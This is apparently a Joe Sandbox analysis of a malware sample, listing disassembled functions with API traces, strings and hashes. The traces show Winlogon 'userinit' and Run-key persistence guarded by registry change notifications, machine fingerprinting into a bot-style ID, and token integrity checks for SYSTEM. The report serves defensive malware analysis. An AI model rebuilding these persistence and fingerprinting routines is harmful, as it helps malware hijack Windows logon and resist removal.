                                                                                                                                                                                                              control_flow_graph 216 12f7dd0-12f7de2 217 12f7de5-12f7dea 216->217 217->217 218 12f7dec-12f7df3 217->218 219 12f7df9-12f7e06 PathFileExistsA 218->219 220 12f7fd7-12f7fdf #680 218->220 219->220 223 12f7e0c-12f7e2b RegOpenKeyExA 219->223 221 12f7ff8-12f8008 220->221 222 12f7fe1-12f7ff6 220->222 224 12f800d-12f8015 RegOpenKeyExA 221->224 222->224 225 12f7f78-12f7f91 RegOpenKeyExA 223->225 226 12f7e31-12f7e55 RegQueryValueExA 223->226 228 12f806b-12f8071 224->228 229 12f8017-12f8026 CreateEventA 224->229 225->220 227 12f7f93-12f7f9b 225->227 230 12f7e5b-12f7e75 GetProcessHeap HeapAlloc 226->230 231 12f7f68-12f7f76 RegFlushKey 226->231 233 12f7fa0-12f7fa5 227->233 229->228 234 12f8028-12f803b WaitForSingleObject 229->234 230->231 235 12f7e7b-12f7ea9 memset RegQueryValueExA StrStrIA 230->235 232 12f7fd1 RegCloseKey 231->232 232->220 233->233 236 12f7fa7-12f7fd0 RegSetValueExA RegFlushKey 233->236 237 12f8041-12f8048 WaitForSingleObject 234->237 238 12f7eaf-12f7eb1 235->238 239 12f7f46-12f7f5a GetProcessHeap HeapValidate 235->239 236->232 237->237 240 12f804a-12f8050 237->240 241 12f7eb4-12f7eb9 238->241 239->231 242 12f7f5c-12f7f62 GetProcessHeap HeapFree 239->242 244 12f805c-12f8069 RegNotifyChangeKeyValue 240->244 245 12f8052-12f8057 call 1304a10 240->245 241->241 243 12f7ebb-12f7ebd 241->243 242->231 246 12f7ebf-12f7ec4 243->246 247 12f7ee1-12f7ee6 243->247 244->237 245->244 246->247 249 12f7ec6-12f7ec9 246->249 250 12f7ee8-12f7eed 247->250 251 12f7ed0-12f7ed6 249->251 250->250 252 12f7eef-12f7ef1 250->252 251->251 253 12f7ed8-12f7ede 251->253 254 12f7ef4-12f7efa 252->254 253->247 254->254 255 12f7efc-12f7f0d 254->255 256 12f7f10-12f7f16 255->256 256->256 257 12f7f18-12f7f24 256->257 258 12f7f27-12f7f2c 257->258 258->258 259 12f7f2e-12f7f40 RegSetValueExA 258->259 259->239
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(01339B58), ref: 012F7DFE
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000103,?), ref: 012F7E27
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,userinit,00000000,00000000,00000000,00000000), ref: 012F7E47
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000010), ref: 012F7E64
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F7E6B
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,-00000010), ref: 012F7E7F
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,userinit,00000000,00000000,00000000,00000000), ref: 012F7E99
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,01339B58), ref: 012F7EA1
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,00000000,00000002), ref: 012F7F40
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F7F4F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F7F52
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F7F5F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F7F62
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(?), ref: 012F7F6C
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F013F,?), ref: 012F7F8D
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,01339B58,01339B5A), ref: 012F7FBD
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(?), ref: 012F7FC7
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 012F7FD1
                                                                                                                                                                                                              • #680.SHELL32 ref: 012F7FD7
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,?), ref: 012F800D
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 012F801C
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000000,0000000F,00000000,00000001), ref: 012F8039
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012F8044
                                                                                                                                                                                                              • RegNotifyChangeKeyValue.ADVAPI32(?,00000000,0000000F,00000000,00000001), ref: 012F8067
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Value$OpenProcess$FlushObjectQuerySingleWait$#680AllocChangeCloseCreateEventExistsFileFreeNotifyPathValidatememset
                                                                                                                                                                                                              • String ID: ,$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                              • API String ID: 3618708129-1653949461
                                                                                                                                                                                                              • Opcode ID: 7f02b1a58748a465583908ba42718d82447eba8bfb541dacc777d4bc04e5e65e
                                                                                                                                                                                                              • Instruction ID: 55b8f685ae63576b039bfb6dbd05af03c5761aada83d5ded4346ad84dfd48d6d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f02b1a58748a465583908ba42718d82447eba8bfb541dacc777d4bc04e5e65e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7271D571650206FBEB319F689C59FFABB6DEF44744F10415CFB01AB285D6B09A05C7A0
                                                                                                                                                                                                              Function 012E30E0 Relevance: 47.4, APIs: 19, Strings: 8, Instructions: 185memoryregistryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 260 12e30e0-12e311a memset call 1304ff0 263 12e32d7-12e32de 260->263 264 12e3120-12e312d call 13050f0 260->264 267 12e3285-12e329b GetProcessHeap HeapValidate 264->267 268 12e3133-12e3170 GetEnvironmentVariableA PathAddBackslashA GetVolumeInformationA 264->268 269 12e32ac-12e32b1 267->269 270 12e329d-12e32a6 GetProcessHeap HeapFree 267->270 271 12e3179-12e3196 RegOpenKeyExA 268->271 272 12e3172 268->272 275 12e32ce-12e32d6 269->275 276 12e32b3-12e32bd GetProcessHeap HeapValidate 269->276 270->269 273 12e31bf-12e31c4 271->273 274 12e3198-12e31b9 RegQueryValueExA RegCloseKey 271->274 272->271 277 12e31c9-12e31d5 273->277 278 12e31c6 273->278 274->273 276->275 279 12e32bf-12e32c8 GetProcessHeap HeapFree 276->279 280 12e31de-12e31e1 CharUpperA 277->280 281 12e31d7-12e31dc 277->281 278->277 279->275 282 12e31e3-12e320d CharUpperA _snprintf 280->282 281->282 283 12e3210-12e3215 282->283 283->283 284 12e3217-12e3219 283->284 285 12e327d-12e3280 284->285 286 12e321b 284->286 285->267 287 12e3220-12e3225 286->287 288 12e3226-12e322c 287->288 288->288 289 12e322e-12e323d 288->289 290 12e3240-12e3245 289->290 290->290 291 12e3247-12e326d _snprintf 290->291 292 12e3270-12e3275 291->292 292->292 293 12e3277-12e327b 292->293 293->285 293->287
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(SYSTEM!841618!025F9049,00000000,00000104,774D2F70,00000000), ref: 012E3106
                                                                                                                                                                                                                • Part of subcall function 01304FF0: memset.MSVCRT(?,00000000,000000DF,00000000,00000000), ref: 01305023
                                                                                                                                                                                                                • Part of subcall function 01304FF0: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 01305032
                                                                                                                                                                                                                • Part of subcall function 01304FF0: HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 01305039
                                                                                                                                                                                                                • Part of subcall function 01304FF0: memset.MSVCRT(00000000,00000000,00000110,?,00000000,00000000), ref: 01305051
                                                                                                                                                                                                                • Part of subcall function 01304FF0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 01305068
                                                                                                                                                                                                                • Part of subcall function 01304FF0: GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 0130506E
                                                                                                                                                                                                                • Part of subcall function 01304FF0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 0130508F
                                                                                                                                                                                                                • Part of subcall function 01304FF0: StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 013050B6
                                                                                                                                                                                                                • Part of subcall function 01304FF0: lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 013050CA
                                                                                                                                                                                                                • Part of subcall function 013050F0: memset.MSVCRT(?,00000000,000000DE,00000000,00000000), ref: 01305124
                                                                                                                                                                                                                • Part of subcall function 013050F0: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 01305133
                                                                                                                                                                                                                • Part of subcall function 013050F0: HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 0130513A
                                                                                                                                                                                                                • Part of subcall function 013050F0: memset.MSVCRT(00000000,00000000,00000110,?,00000000,00000000), ref: 01305152
                                                                                                                                                                                                                • Part of subcall function 013050F0: GetComputerNameA.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000), ref: 01305169
                                                                                                                                                                                                                • Part of subcall function 013050F0: GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 0130516F
                                                                                                                                                                                                                • Part of subcall function 013050F0: GetComputerNameA.KERNEL32(00000000,00000104,00000104,?,?,?,?,00000000,00000000), ref: 01305190
                                                                                                                                                                                                                • Part of subcall function 013050F0: StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 013051B7
                                                                                                                                                                                                                • Part of subcall function 013050F0: lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 013051CB
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104,?,?,774D2F70,00000000), ref: 012E3144
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?,?,?,774D2F70,00000000), ref: 012E3151
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,774D2F70,00000000), ref: 012E3168
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00000101,?,?,?,774D2F70,00000000), ref: 012E318E
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,InstallDate,00000000,?,?,?,?,?,774D2F70,00000000), ref: 012E31AF
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,774D2F70,00000000), ref: 012E31B9
                                                                                                                                                                                                              • CharUpperA.USER32(00000000,?,?,774D2F70,00000000), ref: 012E31DF
                                                                                                                                                                                                              • CharUpperA.USER32(00000000,?,?,?,774D2F70,00000000), ref: 012E31E8
                                                                                                                                                                                                              • _snprintf.MSVCRT(SYSTEM!841618!025F9049,00000104,%s!%s!%08X,00000000,00000000,?,?,774D2F70,00000000), ref: 012E3201
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000004,%02X,54535953), ref: 012E325F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,774D2F70,00000000), ref: 012E328E
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,774D2F70,00000000), ref: 012E3297
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,012F6E07,?,?,774D2F70,00000000), ref: 012E32A3
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,774D2F70,00000000), ref: 012E32A6
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,774D2F70,00000000), ref: 012E32B6
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,774D2F70,00000000), ref: 012E32B9
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,774D2F70,00000000), ref: 012E32C5
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,774D2F70,00000000), ref: 012E32C8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$memset$Name$AllocCharComputerErrorFreeLastUpperUserValidate_snprintflstrcpyn$BackslashCloseEnvironmentInformationOpenPathQueryValueVariableVolume
                                                                                                                                                                                                              • String ID: %02X$%53%59%53%54%45%4D%21%38%34%31%36%31%38%21%30%32%35%46%39%30%34%39$%s!%s!%08X$InstallDate$SYSTEM$SYSTEM!841618!025F9049$Software\Microsoft\Windows NT\CurrentVersion$SystemDrive
                                                                                                                                                                                                              • API String ID: 2057876665-4119864956
                                                                                                                                                                                                              • Opcode ID: a1d953e8855f9ddaa30d86294339ae13d9a8c360e7e46f2b2058ae29f9fa8271
                                                                                                                                                                                                              • Instruction ID: 2f2f96d6711d4aa43477d66847aebfab5de51384a9e70e20f6c5cd5037843a9d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a1d953e8855f9ddaa30d86294339ae13d9a8c360e7e46f2b2058ae29f9fa8271
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A51C571A10216ABDB20EFA99C49FEBBBFCFF84701F444559FA44D7245D6B09A04CBA0
                                                                                                                                                                                                              Function 012E3300 Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 80registryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • #680.SHELL32 ref: 012E3325
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 012E3344
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 012E3351
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 012E336E
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,01325748,000FF0FF), ref: 012E3389
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 012E33A7
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,00000000), ref: 012E33DE
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(00000000,userinit,00000000,00000001,01339B58,00000104), ref: 012E33FC
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 012E340A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • software\microsoft\windows\currentversion\run, xrefs: 012E33D4
                                                                                                                                                                                                              • software\microsoft\windows nt\currentversion\winlogon, xrefs: 012E339D
                                                                                                                                                                                                              • SystemDrive, xrefs: 012E333F
                                                                                                                                                                                                              • userinit, xrefs: 012E33F6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Open$#680BackslashCloseEnvironmentInformationPathQueryValueVariableVolume_snprintf
                                                                                                                                                                                                              • String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                              • API String ID: 3116569548-2324515132
                                                                                                                                                                                                              • Opcode ID: 75a779915b9ed93b3341fc6687734f1735871e24cdc35075a44cc6bc8c2d1525
                                                                                                                                                                                                              • Instruction ID: b4ed9db8e948437bac93a3087aeb604c7d4fde1105ede21a48db7e1c78687cea
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75a779915b9ed93b3341fc6687734f1735871e24cdc35075a44cc6bc8c2d1525
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16210875A90208FBEB24EF90DC8AFED777CAB44B05F504588F700A6184D6F467448BA1
                                                                                                                                                                                                              Function 01304880 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 382 1304880-130489f OpenProcess 383 1304975-130497f 382->383 384 13048a5-13048b4 OpenProcessToken 382->384 385 1304952-1304966 GetHandleInformation 384->385 386 13048ba-13048d2 GetTokenInformation 384->386 385->383 389 1304968-130496c 385->389 387 13048d4-13048ea CharUpperA 386->387 388 1304926-1304934 386->388 390 13048f0-13048f5 387->390 388->385 391 1304936-1304943 GetHandleInformation 388->391 389->383 392 130496e-130496f CloseHandle 389->392 393 1304904-1304914 CharUpperA 390->393 394 13048f7-1304900 390->394 391->385 395 1304945-1304949 391->395 392->383 397 1304922 393->397 398 1304916-130491a 393->398 394->390 396 1304902 394->396 395->385 399 130494b-130494c CloseHandle 395->399 396->388 397->388 398->397 400 130491c-1304920 398->400 399->385 400->388 400->397
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,00000000,774CF550,00000000,7765C3F0), ref: 01304895
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,?,?,?,012F58B3), ref: 013048AC
                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000007(TokenIntegrityLevel),?,00000010,?), ref: 013048CA
                                                                                                                                                                                                              • CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,012F58B3), ref: 013048E2
                                                                                                                                                                                                              • CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,012F58B3), ref: 01304908
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00000000), ref: 0130493B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0130494C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0130495E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0130496F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Information$CharCloseOpenProcessTokenUpper
                                                                                                                                                                                                              • String ID: *SYSTEM*$ADVA
                                                                                                                                                                                                              • API String ID: 1998047302-3691563785
                                                                                                                                                                                                              • Opcode ID: c7dd6f6d6aff218efe8c75a0a860ae8ced45a603782ca62405294cd33768dfc5
                                                                                                                                                                                                              • Instruction ID: 83b73c867403c3a9865658dceec0666058859893757622bc264e142a581e9167
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c7dd6f6d6aff218efe8c75a0a860ae8ced45a603782ca62405294cd33768dfc5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 073181719002096FEB22DFA8C958BEE7BFCAB45319F0480A8EB45A61C5D7749708CB60
                                                                                                                                                                                                              Function 01304FF0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 87memorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 401 1304ff0-1305043 memset GetProcessHeap HeapAlloc 402 1305049-130505b memset 401->402 403 13050da-13050e1 401->403 402->403 404 130505d-130506c GetUserNameA 402->404 405 1305095-13050a0 call 12fade0 404->405 406 130506e-1305077 GetLastError 404->406 405->403 412 13050a2 405->412 406->405 407 1305079-1305088 call 12f41e0 406->407 407->403 413 130508a-1305093 GetUserNameA 407->413 414 13050a3-13050be StrChrIA 412->414 413->403 413->405 415 13050c0-13050d0 lstrcpynA 414->415 416 13050d2-13050d7 414->416 415->416 416->414 417 13050d9 416->417 417->403
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,000000DF,00000000,00000000), ref: 01305023
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 01305032
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 01305039
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000110,?,00000000,00000000), ref: 01305051
                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(00000000,00000104), ref: 01305068
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 0130506E
                                                                                                                                                                                                                • Part of subcall function 012F41E0: GetProcessHeap.KERNEL32(00000008,01305097,00000000,759834D0,?,?,01305084,00000104,?,?,?,?,00000000,00000000), ref: 012F41FE
                                                                                                                                                                                                                • Part of subcall function 012F41E0: HeapAlloc.KERNEL32(00000000,?,?,01305084,00000104,?,?,?,?,00000000,00000000), ref: 012F4205
                                                                                                                                                                                                                • Part of subcall function 012F41E0: memset.MSVCRT(00000000,00000000,01305097,?,?,01305084,00000104,?,?,?,?,00000000,00000000), ref: 012F4215
                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(00000000,00000104), ref: 0130508F
                                                                                                                                                                                                              • StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 013050B6
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 013050CA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789, xrefs: 01305000
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$memset$AllocNameProcessUser$ErrorLastlstrcpyn
                                                                                                                                                                                                              • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
                                                                                                                                                                                                              • API String ID: 3937782766-374730529
                                                                                                                                                                                                              • Opcode ID: d23fc3a1de95735713bdcf739617c519f9f0c3b2ddfde8c30a81d63d4d00283b
                                                                                                                                                                                                              • Instruction ID: 2849e6ed8be8085d9bf84ab4dc081f67087cf263a8851c9dba9ef365c244efeb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d23fc3a1de95735713bdcf739617c519f9f0c3b2ddfde8c30a81d63d4d00283b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3213871900216A7DB33EA688C44BFFBBBCAF84705F204158F64197184EB70AA048BE0
                                                                                                                                                                                                              Function 012F36B0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76registryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 418 12f36b0-12f36cb #680 419 12f36cd-12f36f3 RegOpenKeyExA 418->419 420 12f3727-12f374d RegOpenKeyExA 418->420 423 12f371c-12f3725 419->423 424 12f36f5-12f3716 RegQueryValueExA RegCloseKey 419->424 421 12f374f-12f3770 RegQueryValueExA RegCloseKey 420->421 422 12f3776-12f377d 420->422 421->422 425 12f377f-12f3784 422->425 423->420 423->425 424->423
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • #680.SHELL32(774D2F70,00000000,012F6E1F), ref: 012F36B8
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?), ref: 012F36EF
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,9E2B3FD3a,00000000,?,00000000,?), ref: 012F370C
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 012F3716
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,software\microsoft,00000000,00000101,?), ref: 012F3749
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,9E2B3FD3a,00000000,?,00000000,?), ref: 012F3766
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 012F3770
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue$#680
                                                                                                                                                                                                              • String ID: 9E2B3FD3a$software\microsoft
                                                                                                                                                                                                              • API String ID: 1151197818-795292181
                                                                                                                                                                                                              • Opcode ID: beb0c51d69320da1d7387ca504c6f96d84e13288cb421278559d44e581903058
                                                                                                                                                                                                              • Instruction ID: 6428703863e1077806e1c5a19ddf74bed14dfa19187d167506a41f0d0ef3dcfd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: beb0c51d69320da1d7387ca504c6f96d84e13288cb421278559d44e581903058
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09213C75A5020ABBDB24DFA5CC85FFEB7B8BB44704F10455DE601E6144E7B4A604CB94
                                                                                                                                                                                                              Function 01305A50 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 118COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
